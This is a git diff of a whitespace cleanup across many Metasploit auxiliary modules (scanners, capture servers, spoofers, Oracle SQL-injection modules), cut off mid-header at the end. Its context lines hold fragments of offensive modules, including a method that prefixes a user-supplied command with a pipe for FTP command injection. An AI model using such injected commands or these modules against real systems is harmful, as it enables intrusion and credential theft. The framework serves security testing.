index 50f21a7625..35a8738a70 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -263,6 +263,5 @@ class MetasploitModule < Msf::Auxiliary print_status("The target appears to be safe") end end - end diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index c619170c03..61e2e6e5b6 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 31cbc342ff..b74350d52e 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -209,5 +209,4 @@ class MetasploitModule < Msf::Auxiliary save_array = words.split(/\r?\n/) return save_array end - end diff --git a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb index b5be1ccc35..f2ecf0b685 100644 --- a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb +++ b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index dd16bfe000..47d4ead614 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -28,5 +28,4 @@ class MetasploitModule < Msf::Auxiliary print_good("#{ip}:#{rport} SMTP #{banner_sanitized}") report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner) end - end diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index e41238cfe8..4fd1f4261a 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 79c82166e4..d3894faca0 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -152,5 +152,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_snmp end end - end diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index fce118398d..89f29f17be 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_snmp end end - end diff --git a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb index d5c2912d39..776248448c 100644 --- a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb +++ b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb @@ -308,5 +308,4 @@ class MetasploitModule < Msf::Auxiliary output_data["RADIUS Key"] = radius_key.to_s end end - end diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index d30e83b4f7..241c792195 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index cb647f14cd..ddb5e9959e 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -88,5 +88,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_snmp end end - end diff --git a/modules/auxiliary/scanner/ssh/detect_kippo.rb b/modules/auxiliary/scanner/ssh/detect_kippo.rb index 3bfb47467e..8241aed2c3 100644 --- a/modules/auxiliary/scanner/ssh/detect_kippo.rb +++ b/modules/auxiliary/scanner/ssh/detect_kippo.rb @@ -47,5 +47,4 @@ class MetasploitModule < Msf::Auxiliary vprint_status("#{ip}:#{rport} - #{banner.strip} detected") end end - end diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index fc90951c6c..a692f3cd47 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Auxiliary def rport datastore['RPORT'] end - end diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index e6f7a7dfc4..d516dfb9fe 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Auxiliary def rport datastore['RPORT'] end - end diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 5bce65cfa7..c0e14f5dcf 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -191,5 +191,4 @@ class MetasploitModule < Msf::Auxiliary user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end end - end diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index d93c76f913..c710b45463 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -384,5 +384,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index 6cd494a96f..2836f3bf85 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -156,5 +156,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 5e9379c6f0..6efbf34aaf 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb @@ -195,6 +195,5 @@ class MetasploitModule < Msf::Auxiliary true end - end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index bc012b8b19..74f2378a32 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -835,5 +835,4 @@ class MetasploitModule < Msf::Auxiliary # TODO: return hash with data true end - end diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index ca8845073d..7c74a51ebd 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -442,5 +442,4 @@ class MetasploitModule < Msf::Auxiliary print("\n") if @displaymodem return banner end - end diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb index d863e521d1..c2a5bcaa0a 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Auxiliary return nil end end - end diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index c12fb8408e..17fbb8517c 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Auxiliary start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true, scanner.sock) end - end diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index d9a94b2e40..e3ae15b5f7 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -108,7 +108,6 @@ class MetasploitModule < Msf::Auxiliary pkt << [block].pack("n") # Block Id end - end =begin diff --git a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb index 15ff30174c..8082b8ef84 100644 --- a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb +++ b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Auxiliary pkt << [block].pack("n") # Block Id end - end diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 8d772c4327..97fd6db306 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Auxiliary udp_sock.close end end - end diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index bc9c9a33fa..b1bf03d5c6 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index 8d06911529..5026f6b9ac 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 8bbec1cf55..ffdfc60998 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index c26b4e6a8d..ec7ad9b242 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -127,5 +127,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 0f5e45acb3..4341192d42 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index 9938eaf0b2..247a82c677 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -45,5 +45,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index a3c8015b8c..72fbfd0549 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb index 22fd3ba737..53ec36eb8b 100644 --- a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 1ebde58490..f96f34e06f 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 951b25abed..718eb1db5a 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Auxiliary # Next call end end - end diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 3a43e3a4b0..1f2d39df59 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -85,7 +85,6 @@ class MetasploitModule < Msf::Auxiliary def test_request return winrm_wql_msg("Select Name,Status from Win32_Service") end - end =begin diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index d3eb4dad38..3bacbde2a6 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -55,7 +55,6 @@ class MetasploitModule < Msf::Auxiliary path = store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") print_status "Results saved to #{path}" end - end =begin diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index 09af6dcf8c..c2de0078bd 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/server/android_browsable_msf_launch.rb b/modules/auxiliary/server/android_browsable_msf_launch.rb index 0c7160d99c..15825c2084 100644 --- a/modules/auxiliary/server/android_browsable_msf_launch.rb +++ b/modules/auxiliary/server/android_browsable_msf_launch.rb @@ -49,5 +49,4 @@ location.href = "intent://my_host#Intent;scheme=metasploit;action=android.intent print_status("Sending HTML...") send_response(cli, html) end - end diff --git a/modules/auxiliary/server/android_mercury_parseuri.rb b/modules/auxiliary/server/android_mercury_parseuri.rb index 948059ba0a..8b735a77ab 100644 --- a/modules/auxiliary/server/android_mercury_parseuri.rb +++ b/modules/auxiliary/server/android_mercury_parseuri.rb @@ -150,5 +150,4 @@ class MetasploitModule < Msf::Auxiliary def run exploit end - end diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 71c1eff104..f42f3836c6 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -1072,5 +1072,4 @@ class MetasploitModule < Msf::Auxiliary end super end - end diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index a91787e447..35283e7d01 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Auxiliary def run exploit end - end diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 92d0397485..43e9e9bcdf 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -488,5 +488,4 @@ class MetasploitModule < Msf::Auxiliary | end - end diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb index 293edce594..69b4fb5eac 100644 --- a/modules/auxiliary/server/capture/http_basic.rb +++ b/modules/auxiliary/server/capture/http_basic.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Auxiliary cli.send_response(response) end end - end diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index 672ec74947..bf3a6e7d35 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -299,5 +299,4 @@ EOS EOS return code end - end diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index 8552baf8df..74fef89733 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -270,5 +270,4 @@ class MetasploitModule < Msf::Auxiliary print_good("Loot filename: %s" % loot) end end - end diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 7e64787e5d..d046a6092e 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -647,5 +647,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/server/dhclient_bash_env.rb b/modules/auxiliary/server/dhclient_bash_env.rb index ca21db3c7c..626caf1338 100644 --- a/modules/auxiliary/server/dhclient_bash_env.rb +++ b/modules/auxiliary/server/dhclient_bash_env.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index ca1d5ba903..3f032cc391 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -45,5 +45,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Stopping DHCP server...") @dhcp.stop end - end diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 3ca30cc38d..5366975377 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Auxiliary @sock.close end end - end diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index f4bc5d80d8..876813b277 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -276,5 +276,4 @@ class MetasploitModule < Msf::Auxiliary def print_status(msg) @requestor ? super("%s:%p - DNS - %s" % [@requestor[3], @requestor[1], msg]) : super(msg) end - end diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb index 9a60914aad..76bdafc4e9 100644 --- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb +++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb @@ -267,5 +267,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/server/local_hwbridge.rb b/modules/auxiliary/server/local_hwbridge.rb index b8451e6ae0..773ff8d121 100644 --- a/modules/auxiliary/server/local_hwbridge.rb +++ b/modules/auxiliary/server/local_hwbridge.rb @@ -270,5 +270,4 @@ class MetasploitModule < Msf::Auxiliary @server_started = Time.now exploit end - end diff --git a/modules/auxiliary/server/ms15_134_mcl_leak.rb b/modules/auxiliary/server/ms15_134_mcl_leak.rb index 45b512dcc4..a6205de335 100644 --- a/modules/auxiliary/server/ms15_134_mcl_leak.rb +++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb @@ -168,5 +168,4 @@ for (var i=0; i < files.length; i++) { vprint_status("File collected: #{file[:fname]}\n\n#{Rex::Text.to_hex_dump(file[:data])}") end - end diff --git a/modules/auxiliary/server/netbios_spoof_nat.rb b/modules/auxiliary/server/netbios_spoof_nat.rb index 2430ebd72e..e0537e01e8 100644 --- a/modules/auxiliary/server/netbios_spoof_nat.rb +++ b/modules/auxiliary/server/netbios_spoof_nat.rb @@ -152,5 +152,4 @@ class MetasploitModule < Msf::Auxiliary def run loop { netbios_service } end - end diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb index 8a6a48ab83..4fa0faf3d2 100644 --- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb +++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb @@ -222,5 +222,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/server/pxeexploit.rb b/modules/auxiliary/server/pxeexploit.rb index 7d59d57a3c..8c31e68436 100644 --- a/modules/auxiliary/server/pxeexploit.rb +++ b/modules/auxiliary/server/pxeexploit.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Auxiliary @dhcp.thread.join end - end diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index fa895f9db3..c1849fa180 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Auxiliary @socks4a.join end - end diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index 69fd03b2b2..0e2ad32d89 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Auxiliary vprint_status("Stopping TFTP server") @tftp.stop end - end diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/auxiliary/server/tnftp_savefile.rb index fd9978d05f..bc2065f74f 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/auxiliary/server/tnftp_savefile.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Auxiliary def sploit "|#{datastore['CMD']}" end - end diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index c2db2db257..c11e408608 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -83,5 +83,4 @@ EOS def run exploit() end - end diff --git a/modules/auxiliary/server/wpad.rb b/modules/auxiliary/server/wpad.rb index 92d95ea117..ccaf9629dc 100644 --- a/modules/auxiliary/server/wpad.rb +++ b/modules/auxiliary/server/wpad.rb @@ -83,6 +83,5 @@ EOS end end end - end diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index fb0b355197..e6202f1539 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -193,5 +193,4 @@ class BaseProtocolParser return "%s:%d-%s:%d" % [pkt.ip_saddr,pkt.udp_sport,pkt.ip_daddr,pkt.udp_dport] if pkt.is_udp? return "%s:%d-%s:%d" % [pkt.ip_saddr,0,pkt.ip_daddr,0] end - end diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index 8c0d98e63c..ae6d9ce473 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -410,5 +410,4 @@ class MetasploitModule < Msf::Auxiliary end @listener.abort_on_exception = true end - end diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 8f3bd59996..b9a4b37c5f 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index c9d2d54b47..69a3128b69 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -476,5 +476,4 @@ class MetasploitModule < Msf::Auxiliary # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) avg_count end - end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index dcf5662b24..782c541444 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -473,5 +473,4 @@ class MetasploitModule < Msf::Auxiliary # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) avg_count end - end diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 8a9316fd2b..921b9abde3 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -172,5 +172,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index f781d527a3..cac8b1f4a0 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -175,5 +175,4 @@ class MetasploitModule < Msf::Auxiliary end close_pcap end - end diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index 68b987ba39..71b6506ed2 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -51,5 +51,4 @@ class MetasploitModule < Msf::Auxiliary end close_pcap end - end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index cd2caa9885..c6f0e58922 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Done! Removing function '#{name}'...") prepare_exec(clean) end - end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 3ba1344fae..68b2d99e3e 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Done! Removing function '#{name}'...") prepare_exec(clean) end - end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index 8a07c4ea09..fb164ef63f 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -76,5 +76,4 @@ END; print_status("Done...") end - end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 250f608e8a..065126a1e3 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -87,5 +87,4 @@ END; print_status("Done...") end - end diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index af7b464110..1cee48248a 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -110,5 +110,4 @@ end; # Probably should do a 'drop package #{name}' end - end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index ea7a0943a5..bd29581764 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index 6bddcdb6fb..4c543f073c 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Auxiliary end - end diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 9e88bdbc60..41c92b0402 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Error: #{e.class} #{e}") end end - end diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb 